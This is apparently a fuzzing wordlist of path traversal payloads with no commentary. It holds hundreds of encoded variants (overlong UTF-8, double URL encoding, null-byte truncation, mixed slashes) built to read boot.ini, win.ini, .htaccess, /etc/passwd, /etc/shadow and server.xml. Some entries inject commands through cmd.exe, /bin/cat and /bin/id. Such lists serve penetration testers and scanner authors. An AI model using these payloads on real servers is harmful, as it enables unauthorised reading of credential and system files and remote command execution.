-0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -..%c0%2fboot.ini -..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -..%c0%5cboot.ini -..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -///%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -\\\%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -..//boot.ini -..//..//boot.ini -..//..//..//boot.ini -..//..//..//..//boot.ini -..//..//..//..//..//boot.ini -..//..//..//..//..//..//boot.ini -..//..//..//..//..//..//..//boot.ini -..//..//..//..//..//..//..//..//boot.ini -..///boot.ini -..///..///boot.ini -..///..///..///boot.ini -..///..///..///..///boot.ini -..///..///..///..///..///boot.ini -..///..///..///..///..///..///boot.ini -..///..///..///..///..///..///..///boot.ini -..///..///..///..///..///..///..///..///boot.ini -..\\boot.ini -..\\..\\boot.ini -..\\..\\..\\boot.ini -..\\..\\..\\..\\boot.ini -..\\..\\..\\..\\..\\boot.ini -..\\..\\..\\..\\..\\..\\boot.ini -..\\..\\..\\..\\..\\..\\..\\boot.ini -..\\..\\..\\..\\..\\..\\..\\..\\boot.ini -..\\\boot.ini -..\\\..\\\boot.ini -..\\\..\\\..\\\boot.ini -..\\\..\\\..\\\..\\\boot.ini -..\\\..\\\..\\\..\\\..\\\boot.ini -..\\\..\\\..\\\..\\\..\\\..\\\boot.ini -..\\\..\\\..\\\..\\\..\\\..\\\..\\\boot.ini -..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\boot.ini -./\/./boot.ini -./\/././\/./boot.ini -./\/././\/././\/./boot.ini -./\/././\/././\/././\/./boot.ini -./\/././\/././\/././\/././\/./boot.ini -./\/././\/././\/././\/././\/././\/./boot.ini -./\/././\/././\/././\/././\/././\/././\/./boot.ini -./\/././\/././\/././\/././\/././\/././\/././\/./boot.ini -.\/\.\boot.ini -.\/\.\.\/\.\boot.ini -.\/\.\.\/\.\.\/\.\boot.ini -.\/\.\.\/\.\.\/\.\.\/\.\boot.ini -.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\boot.ini -.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\boot.ini -.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\boot.ini -.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\boot.ini -./../boot.ini -./.././../boot.ini -./.././.././../boot.ini -./.././.././.././../boot.ini -./.././.././.././.././../boot.ini -./.././.././.././.././.././../boot.ini -./.././.././.././.././.././.././../boot.ini -./.././.././.././.././.././.././.././../boot.ini -.\..\boot.ini -.\..\.\..\boot.ini -.\..\.\..\.\..\boot.ini -.\..\.\..\.\..\.\..\boot.ini -.\..\.\..\.\..\.\..\.\..\boot.ini -.\..\.\..\.\..\.\..\.\..\.\..\boot.ini -.\..\.\..\.\..\.\..\.\..\.\..\.\..\boot.ini -.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\boot.ini -.//..//boot.ini -.//..//.//..//boot.ini -.//..//.//..//.//..//boot.ini -.//..//.//..//.//..//.//..//boot.ini -.//..//.//..//.//..//.//..//.//..//boot.ini -.//..//.//..//.//..//.//..//.//..//.//..//boot.ini -.//..//.//..//.//..//.//..//.//..//.//..//.//..//boot.ini -.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//boot.ini -.\\..\\boot.ini -.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -C:/inetpub/wwwroot/global.asa -C:\inetpub\wwwroot\global.asa -C:/boot.ini -C:\boot.ini -D:\inetpub\wwwroot\global.asa -D:/inetpub/wwwroot/global.asa -Statement -\..\WINDOWS\win.ini -\..\..\WINDOWS\win.ini -\..\..\..\WINDOWS\win.ini -\..\..\..\..\WINDOWS\win.ini -\..\..\..\..\..\WINDOWS\win.ini -\..\..\..\..\..\..\WINDOWS\win.ini -%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 -%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 -%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 -%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 -%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 -%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 -%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 -%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 -%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 -%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 -%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 -..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ -..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ -..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ -..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ -..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ -..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ -..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c -%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c -%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c -%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c -../../../../../../../../../etc/passwd -../../../../../../../../etc/passwd -../../../../../../../etc/passwd -../../../../../../etc/passwd -../../../../../etc/passwd -../../../../etc/passwd -../../../etc/passwd -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 -%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 -%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 -../../../.htaccess -../../.htaccess -../.htaccess -.htaccess -././.htaccess -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73 -%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73 -%2e%2e%2f%2e%68%74%61%63%63%65%73%73 -%2e%68%74%61%63%63%65%73%73 -%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73 -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 -%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 -%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 -%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 -../../../../../../../../../../../../etc/hosts%00 -../../../../../../../../../../../../etc/hosts -../../boot.ini -/../../../../../../../../%2A -../../../../../../../../../../../../etc/passwd%00 -../../../../../../../../../../../../etc/passwd -../../../../../../../../../../../../etc/shadow%00 -../../../../../../../../../../../../etc/shadow -/../../../../../../../../../../etc/passwd^^ -/../../../../../../../../../../etc/shadow^^ -/../../../../../../../../../../etc/passwd -/../../../../../../../../../../etc/shadow -/./././././././././././etc/passwd -/./././././././././././etc/shadow -\..\..\..\..\..\..\..\..\..\..\etc\passwd -\..\..\..\..\..\..\..\..\..\..\etc\shadow -..\..\..\..\..\..\..\..\..\..\etc\passwd -..\..\..\..\..\..\..\..\..\..\etc\shadow -/..\../..\../..\../..\../..\../..\../etc/passwd -/..\../..\../..\../..\../..\../..\../etc/shadow -.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd -.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow -\..\..\..\..\..\..\..\..\..\..\etc\passwd%00 -\..\..\..\..\..\..\..\..\..\..\etc\shadow%00 -..\..\..\..\..\..\..\..\..\..\etc\passwd%00 -..\..\..\..\..\..\..\..\..\..\etc\shadow%00 -%0a/bin/cat%20/etc/passwd -%0a/bin/cat%20/etc/shadow -%00/etc/passwd%00 -%00/etc/shadow%00 -%00../../../../../../etc/passwd -%00../../../../../../etc/shadow -/../../../../../../../../../../../etc/passwd%00.jpg -/../../../../../../../../../../../etc/passwd%00.html -/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd -/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow -%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 -/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 -%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% -/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini -\\'/bin/cat%20/etc/passwd\\' -\\'/bin/cat%20/etc/shadow\\' -../../../../../../../../conf/server.xml -/../../../../../../../../bin/id| -C:/inetpub/wwwroot/global.asa -C:\inetpub\wwwroot\global.asa -C:/boot.ini -C:\boot.ini -../../../../../../../../../../../../localstart.asp%00 -../../../../../../../../../../../../localstart.asp -../../../../../../../../../../../../boot.ini%00 -../../../../../../../../../../../../boot.ini -/./././././././././././boot.ini -/../../../../../../../../../../../boot.ini%00 